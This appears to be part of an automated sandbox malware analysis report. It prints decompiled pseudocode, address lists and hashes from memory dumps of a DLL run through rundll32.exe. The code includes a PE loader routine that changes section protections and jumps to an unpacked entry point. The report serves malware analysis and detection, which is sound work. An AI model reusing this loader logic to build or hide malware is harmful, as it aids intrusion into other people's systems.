                                                                                                        0x10012026
                                                                                                        0x10012026
                                                                                                        0x1001202c
                                                                                                        0x00000000
                                                                                                        0x1001202c
                                                                                                        0x1001205d
                                                                                                        0x1001205d
                                                                                                        0x10012066
                                                                                                        0x10012069
                                                                                                        0x1001206e
                                                                                                        0x00000000
                                                                                                        0x1001206e
                                                                                                        0x10012098
                                                                                                        0x1001209c
                                                                                                        0x1001209d
                                                                                                        0x100120a1
                                                                                                        0x100120a5
                                                                                                        0x100120af
                                                                                                        0x100120b2
                                                                                                        0x100120b5
                                                                                                        0x100120b8
                                                                                                        0x100120b8
                                                                                                        0x100120b8
                                                                                                        0x100120bb
                                                                                                        0x00000000
                                                                                                        0x100120bb
                                                                                                        0x10011fc2
                                                                                                        0x10011fd2
                                                                                                        0x10011fd2
                                                                                                        0x10011fd4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011fca
                                                                                                        0x10011fcc
                                                                                                        0x10011fcc
                                                                                                        0x00000000
                                                                                                        0x10011fd2
                                                                                                        0x10011f9d
                                                                                                        0x10011fa3
                                                                                                        0x10011fa9
                                                                                                        0x10011fa9
                                                                                                        0x00000000
                                                                                                        0x10011fa3
                                                                                                        0x10011f77
                                                                                                        0x10011f7b
                                                                                                        0x10011f0d
                                                                                                        0x00000000
                                                                                                        0x10011f0d
                                                                                                        0x10011f7d
                                                                                                        0x10011f7d
                                                                                                        0x00000000
                                                                                                        0x10011f7d
                                                                                                        0x10011f32
                                                                                                        0x10011f32
                                                                                                        0x10011f34
                                                                                                        0x10011f34
                                                                                                        0x10011f38
                                                                                                        0x10011f3b
                                                                                                        0x10011f3e
                                                                                                        0x10011f41
                                                                                                        0x10011f47
                                                                                                        0x10011f4a
                                                                                                        0x10011f51
                                                                                                        0x10011f54
                                                                                                        0x10011f56
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011f58
                                                                                                        0x10011f59
                                                                                                        0x10011f5e
                                                                                                        0x10011f60
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011f60
                                                                                                        0x00000000
                                                                                                        0x10011f34
                                                                                                        0x10011f10
                                                                                                        0x10011ddd
                                                                                                        0x10011ddf
                                                                                                        0x10011de5
                                                                                                        0x10011df6
                                                                                                        0x10011df8
                                                                                                        0x10011dfa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011e0d
                                                                                                        0x10011e0f
                                                                                                        0x10011e11
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011e17
                                                                                                        0x10011e17
                                                                                                        0x10011e1e
                                                                                                        0x10011e20
                                                                                                        0x10011e23
                                                                                                        0x10011e25
                                                                                                        0x10011de3
                                                                                                        0x10011de3
                                                                                                        0x10011de3
                                                                                                        0x00000000
                                                                                                        0x10011de3
                                                                                                        0x10011e2a
                                                                                                        0x10011e2c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011e2e
                                                                                                        0x10011e30
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011e3f
                                                                                                        0x10011e4f
                                                                                                        0x10011e62
                                                                                                        0x10011e64
                                                                                                        0x10011e66
                                                                                                        0x10011e91
                                                                                                        0x10011e9a
                                                                                                        0x10011eaa
                                                                                                        0x10011eac
                                                                                                        0x10011eb5
                                                                                                        0x10011ebc
                                                                                                        0x10011ecc
                                                                                                        0x10011ed3
                                                                                                        0x10011ed3
                                                                                                        0x10011ee2
                                                                                                        0x10011eeb
                                                                                                        0x10011ef0
                                                                                                        0x10011ef4
                                                                                                        0x00000000
                                                                                                        0x10011ef4
                                                                                                        0x10011e73
                                                                                                        0x10011e7a
                                                                                                        0x10011e8b
                                                                                                        0x10011e8d
                                                                                                        0x10011e8f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011e8f
                                                                                                        0x10011de5
                                                                                                        0x00000000
                                                                                                        0x10011d82
                                                                                                        0x10011d82
                                                                                                        0x10011d8c
                                                                                                        0x1001207d
                                                                                                        0x1001207d
                                                                                                        0x00000000
                                                                                                        0x10011d8c

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.599608439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.599564255.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599779565.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599845598.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599864111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5d1683bff0e1a29d0212b6883f1335e9ab6e3bc7cd7ca7886de007c2d64f20f4
                                                                                                        • Instruction ID: 5609b69e05a1b06f5233c8e7297c4b8c04bd3945fb3a39e2e71c43012004eafc
                                                                                                        • Opcode Fuzzy Hash: 5d1683bff0e1a29d0212b6883f1335e9ab6e3bc7cd7ca7886de007c2d64f20f4
                                                                                                        • Instruction Fuzzy Hash: 53A1E7746043459BE714EF15C880BAEB3E6FF94340F21CA2DE9948F296D771E982CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10006D50, Relevance: .0, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10006D50() {

				 *0x1001d280 = GetUserNameW;
				 *0x1001D284 = MessageBoxW;
				 *0x1001D288 = GetLastError;
				 *0x1001D28C = CreateFileA;
				 *0x1001D290 = DebugBreak;
				 *0x1001D294 = FlushFileBuffers;
				 *0x1001D298 = FreeEnvironmentStringsA;
				 *0x1001D29C = GetConsoleOutputCP;
				 *0x1001D2A0 = GetEnvironmentStrings;
				 *0x1001D2A4 = GetLocaleInfoA;
				 *0x1001D2A8 = GetStartupInfoA;
				 *0x1001D2AC = GetStringTypeA;
				 *0x1001D2B0 = HeapValidate;
				 *0x1001D2B4 = IsBadReadPtr;
				 *0x1001D2B8 = LCMapStringA;
				 *0x1001D2BC = LoadLibraryA;
				 *0x1001D2C0 = OutputDebugStringA;
				return 0x1001d280;
			}



                                                                                                        0x10006d61
                                                                                                        0x10006d69
                                                                                                        0x10006d6c
                                                                                                        0x10006d7b
                                                                                                        0x10006d7e
                                                                                                        0x10006d8d
                                                                                                        0x10006d90
                                                                                                        0x10006d9f
                                                                                                        0x10006da2
                                                                                                        0x10006db1
                                                                                                        0x10006db4
                                                                                                        0x10006dc3
                                                                                                        0x10006dc6
                                                                                                        0x10006dd5
                                                                                                        0x10006dd8
                                                                                                        0x10006de7
                                                                                                        0x10006dea
                                                                                                        0x10006ded

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.599608439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.599564255.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599779565.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599845598.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599864111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 80f6e1a276fef8b33378afc9592b3d211071bdeb012eb600a46219d4b0432dd1
                                                                                                        • Instruction ID: 9a9f90be372116ce35b3bf57ca6adafecb814b37ff7dc50591bd4b03753dcc6b
                                                                                                        • Opcode Fuzzy Hash: 80f6e1a276fef8b33378afc9592b3d211071bdeb012eb600a46219d4b0432dd1
                                                                                                        • Instruction Fuzzy Hash: 99110FB8A05620CFD34ACF09D5D49117BF2BB8E360312C19AD8098B376D734D985CF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000C218, Relevance: 5.1, Strings: 4, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 83%
                                                                                                        			E1000C218(void* __ecx, void* __edx) {
				char _v28;
				char _v33;
				char _v38;
				char _v43;
				void* _t24;
				char* _t25;
				char _t32;
				void* _t33;
				void* _t34;
				signed int _t38;
				char* _t40;

				_t40 = (_t38 & 0xfffffff0) - 0x2c;
				asm("movq xmm0, [edx]");
				_t32 = 0;
				 *_t40 = 0x7b;
				asm("movq [esp+0x1], xmm0");
				_v43 = 0x2d;
				do {
					 *((char*)(_t40 + _t32 + 0xa)) =  *((intOrPtr*)(_t32 + __edx + 8));
					_t32 = _t32 + 1;
				} while (_t32 < 4);
				_v38 = 0x2d;
				_t33 = 0;
				do {
					 *((char*)(_t40 + _t33 + 0xf)) =  *((intOrPtr*)(_t33 + __edx + 0xc));
					_t33 = _t33 + 1;
				} while (_t33 < 4);
				_v33 = 0x2d;
				_t34 = 0;
				do {
					 *((char*)(_t40 + _t34 + 0x14)) =  *((intOrPtr*)(_t34 + __edx + 0x10));
					_t34 = _t34 + 1;
				} while (_t34 < 4);
				_v28 = 0x2d;
				_t24 = 0;
				do {
					asm("movd xmm0, dword [eax+edx+0x14]");
					asm("movd [esp+eax+0x19], xmm0");
					_t24 = _t24 + 4;
				} while (_t24 < 0xc);
				_t25 = _t40;
				 *((char*)(_t25 + 0x25)) = 0x7d;
				 *((char*)(_t25 + 0x26)) = 0;
				E1000DFBC(__ecx, _t25, 0);
				return __ecx;
			}














                                                                                                        0x1000c21f
                                                                                                        0x1000c224
                                                                                                        0x1000c228
                                                                                                        0x1000c22a
                                                                                                        0x1000c22e
                                                                                                        0x1000c234
                                                                                                        0x1000c239
                                                                                                        0x1000c23d
                                                                                                        0x1000c241
                                                                                                        0x1000c242
                                                                                                        0x1000c249
                                                                                                        0x1000c24e
                                                                                                        0x1000c250
                                                                                                        0x1000c254
                                                                                                        0x1000c258
                                                                                                        0x1000c259
                                                                                                        0x1000c260
                                                                                                        0x1000c265
                                                                                                        0x1000c267
                                                                                                        0x1000c26b
                                                                                                        0x1000c26f
                                                                                                        0x1000c270
                                                                                                        0x1000c275
                                                                                                        0x1000c27a
                                                                                                        0x1000c27c
                                                                                                        0x1000c27c
                                                                                                        0x1000c282
                                                                                                        0x1000c288
                                                                                                        0x1000c28b
                                                                                                        0x1000c292
                                                                                                        0x1000c295
                                                                                                        0x1000c29b
                                                                                                        0x1000c2a0
                                                                                                        0x1000c2ae

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.599608439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.599564255.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599779565.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599845598.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599864111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -$-$-$-
                                                                                                        • API String ID: 0-1033403326
                                                                                                        • Opcode ID: 1d36367edc1a87d387ea343f4f2a29612f5303ddecac01934eed59726700fcc9
                                                                                                        • Instruction ID: 6420cdf91b2b9fc5655fa5f82b4c53aa5eb92ddd4154ae73ebf41adf494228f8
                                                                                                        • Opcode Fuzzy Hash: 1d36367edc1a87d387ea343f4f2a29612f5303ddecac01934eed59726700fcc9
                                                                                                        • Instruction Fuzzy Hash: C811252091C3C04CE749DB7C548462BFFD08F9A208F1886BEE4DA86B53E525D49683B7
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Analysis Process: rundll32.exe PID: 644 Parent PID: 4240 rundll32.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 00B9193D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 42%
                                                                                                        			E00B9193D(void* __ebx, long __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				char* _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				int _v160;
				intOrPtr _v164;
				char* _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v180;
				intOrPtr* _t135;
				int _t142;
				int _t150;
				int _t154;
				intOrPtr _t169;
				int _t175;
				intOrPtr _t217;
				void* _t224;
				intOrPtr _t227;
				void* _t234;
				intOrPtr _t238;
				intOrPtr _t245;
				intOrPtr _t249;
				DWORD* _t263;
				void* _t267;
				intOrPtr* _t270;
				intOrPtr* _t271;

				_t135 = _a4;
				_v20 = 0;
				_t234 =  *((intOrPtr*)(_t135 + 0x28));
				 *0xb94418 = 1;
				asm("movaps xmm0, [0xb93010]");
				asm("movups [0xb94428], xmm0");
				_v48 = _t135;
				_v52 =  *((intOrPtr*)(_t135 + 0x44));
				_v56 =  *((intOrPtr*)(_v48 + 0xc));
				_v180 = _t234;
				_v176 =  *((intOrPtr*)(_v48 + 0x48));
				_v172 = 4;
				_v168 =  &_v20;
				_v60 =  *((intOrPtr*)(_t135 + 0x30));
				_v64 = 4;
				_v68 = _t234;
				_v72 =  &_v20;
				_t142 = VirtualProtect(__ebx, __esi, __edi, _t263); // executed
				_v76 = _t142;
				_v180 = _v68;
				_v176 = 0;
				_v172 =  *((intOrPtr*)(_v48 + 0x48));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E00B9173B();
				E00B921C2(_v68,  *_v48, _v60);
				E00B9173B( *_v48, 0, _v60);
				_t150 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t270 = _t267 - 0x84;
				_t224 = _v68;
				_t249 =  *((intOrPtr*)(_t224 + 0x3c));
				_v96 = _t150;
				_v100 = _v68 + 0x3c;
				_v104 = _t224;
				_v108 = _t249;
				if(_t249 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v112 = _v104;
				if(_v56 != 0) {
					_v116 = 0;
					_v120 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
					while(1) {
						_t169 = _v120;
						_v152 = _t169;
						_t245 = _v152;
						_v180 = _v68 +  *((intOrPtr*)(_t245 + 0xc));
						_v176 =  *((intOrPtr*)(_t245 + 8));
						_v172 =  *((intOrPtr*)(0xb94418 + (( *(_t169 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t169 + 0x24) >> 0x1f << 3) + (( *(_t169 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v168 =  &_v20;
						_v156 = _v116;
						_t175 = VirtualProtect(??, ??, ??, ??); // executed
						_t270 = _t270 - 0x10;
						_t217 = _v156 + 1;
						_v160 = _t175;
						_v116 = _t217;
						_v120 = _v152 + 0x28;
						if(_t217 == _v56) {
							goto L12;
						}
					}
				}
				L12:
				 *_t270 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x3c));
				_t154 = DisableThreadLibraryCalls(??);
				_t271 = _t270 - 4;
				_t227 =  *_v100;
				_v164 = _t154;
				_v124 = _t227;
				_v128 = _v68;
				if(_t227 != 0) {
					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t238 = _v48;
				_v44 =  *((intOrPtr*)(_t238 + 0x40));
				_v40 =  *((intOrPtr*)(_t238 + 0x24));
				_v36 =  *((intOrPtr*)(_t238 + 0x38));
				_v32 =  *((intOrPtr*)(_t238 + 0x50));
				_v28 =  *((intOrPtr*)(_t238 + 0x18));
				_v24 = _v132;
				 *_t271 = _t238;
				_v180 = 0;
				_v176 = 0x5c;
				_v136 =  &_v44;
				_v140 = 0;
				_v144 = 0x5c;
				_v148 =  *((intOrPtr*)(_v128 + 0x28));
				E00B9173B();
				if(_v148 != 0) {
					_t270 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}





























































                                                                                                        0x00b91949
                                                                                                        0x00b91957
                                                                                                        0x00b9195e
                                                                                                        0x00b91961
                                                                                                        0x00b9196b
                                                                                                        0x00b91972
                                                                                                        0x00b9197c
                                                                                                        0x00b91982
                                                                                                        0x00b9198b
                                                                                                        0x00b91994
                                                                                                        0x00b91997
                                                                                                        0x00b9199b
                                                                                                        0x00b919a3
                                                                                                        0x00b919aa
                                                                                                        0x00b919ad
                                                                                                        0x00b919b0
                                                                                                        0x00b919b3
                                                                                                        0x00b919b6
                                                                                                        0x00b919d0
                                                                                                        0x00b919d6
                                                                                                        0x00b919d9
                                                                                                        0x00b919e1
                                                                                                        0x00b919e5
                                                                                                        0x00b919e8
                                                                                                        0x00b919eb
                                                                                                        0x00b919ee
                                                                                                        0x00b919f1
                                                                                                        0x00b91a0c
                                                                                                        0x00b91a28
                                                                                                        0x00b91a4d
                                                                                                        0x00b91a4f
                                                                                                        0x00b91a58
                                                                                                        0x00b91a5b
                                                                                                        0x00b91a65
                                                                                                        0x00b91a68
                                                                                                        0x00b91a6b
                                                                                                        0x00b91a6e
                                                                                                        0x00b91a71
                                                                                                        0x00b91a8c
                                                                                                        0x00b91a8c
                                                                                                        0x00b91b76
                                                                                                        0x00b91b79
                                                                                                        0x00b91aa5
                                                                                                        0x00b91aa8
                                                                                                        0x00b91b84
                                                                                                        0x00b91b84
                                                                                                        0x00b91b9b
                                                                                                        0x00b91bc3
                                                                                                        0x00b91bcf
                                                                                                        0x00b91bd2
                                                                                                        0x00b91bd6
                                                                                                        0x00b91bda
                                                                                                        0x00b91be1
                                                                                                        0x00b91be7
                                                                                                        0x00b91be9
                                                                                                        0x00b91bf2
                                                                                                        0x00b91c03
                                                                                                        0x00b91c09
                                                                                                        0x00b91c0c
                                                                                                        0x00b91c0f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b91c11
                                                                                                        0x00b91b84
                                                                                                        0x00b91c31
                                                                                                        0x00b91c3f
                                                                                                        0x00b91c47
                                                                                                        0x00b91c4a
                                                                                                        0x00b91c4c
                                                                                                        0x00b91c52
                                                                                                        0x00b91c5e
                                                                                                        0x00b91c64
                                                                                                        0x00b91c67
                                                                                                        0x00b91c6a
                                                                                                        0x00b91ae4
                                                                                                        0x00b91ae4
                                                                                                        0x00b91af7
                                                                                                        0x00b91afd
                                                                                                        0x00b91b03
                                                                                                        0x00b91b09
                                                                                                        0x00b91b0f
                                                                                                        0x00b91b15
                                                                                                        0x00b91b1b
                                                                                                        0x00b91b1e
                                                                                                        0x00b91b21
                                                                                                        0x00b91b29
                                                                                                        0x00b91b31
                                                                                                        0x00b91b37
                                                                                                        0x00b91b3d
                                                                                                        0x00b91b43
                                                                                                        0x00b91b49
                                                                                                        0x00b91b57
                                                                                                        0x00b91c24
                                                                                                        0x00b91c2a
                                                                                                        0x00b91c2a
                                                                                                        0x00b91ac9

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.655247815.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID: \
                                                                                                        • API String ID: 544645111-2967466578
                                                                                                        • Opcode ID: d93ca1f1b4e927b4ab5a03fe94ff01451692b7fb2d156198cbbc1615081f53e8
                                                                                                        • Instruction ID: 7c83bba298afa06c109d6991e61ec72f27d9ece8cd00c24d78175d551bda5c30
                                                                                                        • Opcode Fuzzy Hash: d93ca1f1b4e927b4ab5a03fe94ff01451692b7fb2d156198cbbc1615081f53e8
                                                                                                        • Instruction Fuzzy Hash: 8FB1AEB4D042198FCB14CFA9C980A9DFBF1FF88310F1585AAE959AB351D730A941CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B91C7F, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.655247815.0000000000B90000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                        • Instruction ID: c09877074f607d2dd69ae3f885deaec680b657e3ca75356c4a2d4f4e662fca5f
                                                                                                        • Opcode Fuzzy Hash: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                        • Instruction Fuzzy Hash: 4741C1B5E0461A9FDB04CFA8C4906AEBBF1FF48714F14856DE948AB340D379A881CF94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Analysis Process: rundll32.exe PID: 2908 Parent PID: 4240 rundll32.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 009E193D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 42%
                                                                                                        			E009E193D(void* __ebx, long __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				char* _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				int _v160;
				intOrPtr _v164;
				char* _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v180;
				intOrPtr* _t135;
				int _t142;
				int _t150;
				int _t154;
				intOrPtr _t169;
				int _t175;
				intOrPtr _t217;
				void* _t224;
				intOrPtr _t227;
				void* _t234;
				intOrPtr _t238;
				intOrPtr _t245;
				intOrPtr _t249;
				DWORD* _t263;
				void* _t267;
				intOrPtr* _t270;
				intOrPtr* _t271;

				_t135 = _a4;
				_v20 = 0;
				_t234 =  *((intOrPtr*)(_t135 + 0x28));
				 *0x9e4418 = 1;
				asm("movaps xmm0, [0x9e3010]");
				asm("movups [0x9e4428], xmm0");
				_v48 = _t135;
				_v52 =  *((intOrPtr*)(_t135 + 0x44));
				_v56 =  *((intOrPtr*)(_v48 + 0xc));
				_v180 = _t234;
				_v176 =  *((intOrPtr*)(_v48 + 0x48));
				_v172 = 4;
				_v168 =  &_v20;
				_v60 =  *((intOrPtr*)(_t135 + 0x30));
				_v64 = 4;
				_v68 = _t234;
				_v72 =  &_v20;
				_t142 = VirtualProtect(__ebx, __esi, __edi, _t263); // executed
				_v76 = _t142;
				_v180 = _v68;
				_v176 = 0;
				_v172 =  *((intOrPtr*)(_v48 + 0x48));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E009E173B();
				E009E21C2(_v68,  *_v48, _v60);
				E009E173B( *_v48, 0, _v60);
				_t150 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t270 = _t267 - 0x84;
				_t224 = _v68;
				_t249 =  *((intOrPtr*)(_t224 + 0x3c));
				_v96 = _t150;
				_v100 = _v68 + 0x3c;
				_v104 = _t224;
				_v108 = _t249;
				if(_t249 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v112 = _v104;
				if(_v56 != 0) {
					_v116 = 0;
					_v120 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
					while(1) {
						_t169 = _v120;
						_v152 = _t169;
						_t245 = _v152;
						_v180 = _v68 +  *((intOrPtr*)(_t245 + 0xc));
						_v176 =  *((intOrPtr*)(_t245 + 8));
						_v172 =  *((intOrPtr*)(0x9e4418 + (( *(_t169 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t169 + 0x24) >> 0x1f << 3) + (( *(_t169 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v168 =  &_v20;
						_v156 = _v116;
						_t175 = VirtualProtect(??, ??, ??, ??); // executed
						_t270 = _t270 - 0x10;
						_t217 = _v156 + 1;
						_v160 = _t175;
						_v116 = _t217;
						_v120 = _v152 + 0x28;
						if(_t217 == _v56) {
							goto L12;
						}
					}
				}
				L12:
				 *_t270 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x3c));
				_t154 = DisableThreadLibraryCalls(??);
				_t271 = _t270 - 4;
				_t227 =  *_v100;
				_v164 = _t154;
				_v124 = _t227;
				_v128 = _v68;
				if(_t227 != 0) {
					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t238 = _v48;
				_v44 =  *((intOrPtr*)(_t238 + 0x40));
				_v40 =  *((intOrPtr*)(_t238 + 0x24));
				_v36 =  *((intOrPtr*)(_t238 + 0x38));
				_v32 =  *((intOrPtr*)(_t238 + 0x50));
				_v28 =  *((intOrPtr*)(_t238 + 0x18));
				_v24 = _v132;
				 *_t271 = _t238;
				_v180 = 0;
				_v176 = 0x5c;
				_v136 =  &_v44;
				_v140 = 0;
				_v144 = 0x5c;
				_v148 =  *((intOrPtr*)(_v128 + 0x28));
				E009E173B();
				if(_v148 != 0) {
					_t270 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}





























































                                                                                                        0x009e1949
                                                                                                        0x009e1957
                                                                                                        0x009e195e
                                                                                                        0x009e1961
                                                                                                        0x009e196b
                                                                                                        0x009e1972
                                                                                                        0x009e197c
                                                                                                        0x009e1982
                                                                                                        0x009e198b
                                                                                                        0x009e1994
                                                                                                        0x009e1997
                                                                                                        0x009e199b
                                                                                                        0x009e19a3
                                                                                                        0x009e19aa
                                                                                                        0x009e19ad
                                                                                                        0x009e19b0
                                                                                                        0x009e19b3
                                                                                                        0x009e19b6
                                                                                                        0x009e19d0
                                                                                                        0x009e19d6
                                                                                                        0x009e19d9
                                                                                                        0x009e19e1
                                                                                                        0x009e19e5
                                                                                                        0x009e19e8
                                                                                                        0x009e19eb
                                                                                                        0x009e19ee
                                                                                                        0x009e19f1
                                                                                                        0x009e1a0c
                                                                                                        0x009e1a28
                                                                                                        0x009e1a4d
                                                                                                        0x009e1a4f
                                                                                                        0x009e1a58
                                                                                                        0x009e1a5b
                                                                                                        0x009e1a65
                                                                                                        0x009e1a68
                                                                                                        0x009e1a6b
                                                                                                        0x009e1a6e
                                                                                                        0x009e1a71
                                                                                                        0x009e1a8c
                                                                                                        0x009e1a8c
                                                                                                        0x009e1b76
                                                                                                        0x009e1b79
                                                                                                        0x009e1aa5
                                                                                                        0x009e1aa8
                                                                                                        0x009e1b84
                                                                                                        0x009e1b84
                                                                                                        0x009e1b9b
                                                                                                        0x009e1bc3
                                                                                                        0x009e1bcf
                                                                                                        0x009e1bd2
                                                                                                        0x009e1bd6
                                                                                                        0x009e1bda
                                                                                                        0x009e1be1
                                                                                                        0x009e1be7
                                                                                                        0x009e1be9
                                                                                                        0x009e1bf2
                                                                                                        0x009e1c03
                                                                                                        0x009e1c09
                                                                                                        0x009e1c0c
                                                                                                        0x009e1c0f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x009e1c11
                                                                                                        0x009e1b84
                                                                                                        0x009e1c31
                                                                                                        0x009e1c3f
                                                                                                        0x009e1c47
                                                                                                        0x009e1c4a
                                                                                                        0x009e1c4c
                                                                                                        0x009e1c52
                                                                                                        0x009e1c5e
                                                                                                        0x009e1c64
                                                                                                        0x009e1c67
                                                                                                        0x009e1c6a
                                                                                                        0x009e1ae4
                                                                                                        0x009e1ae4
                                                                                                        0x009e1af7
                                                                                                        0x009e1afd
                                                                                                        0x009e1b03
                                                                                                        0x009e1b09
                                                                                                        0x009e1b0f
                                                                                                        0x009e1b15
                                                                                                        0x009e1b1b
                                                                                                        0x009e1b1e
                                                                                                        0x009e1b21
                                                                                                        0x009e1b29
                                                                                                        0x009e1b31
                                                                                                        0x009e1b37
                                                                                                        0x009e1b3d
                                                                                                        0x009e1b43
                                                                                                        0x009e1b49
                                                                                                        0x009e1b57
                                                                                                        0x009e1c24
                                                                                                        0x009e1c2a
                                                                                                        0x009e1c2a
                                                                                                        0x009e1ac9

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
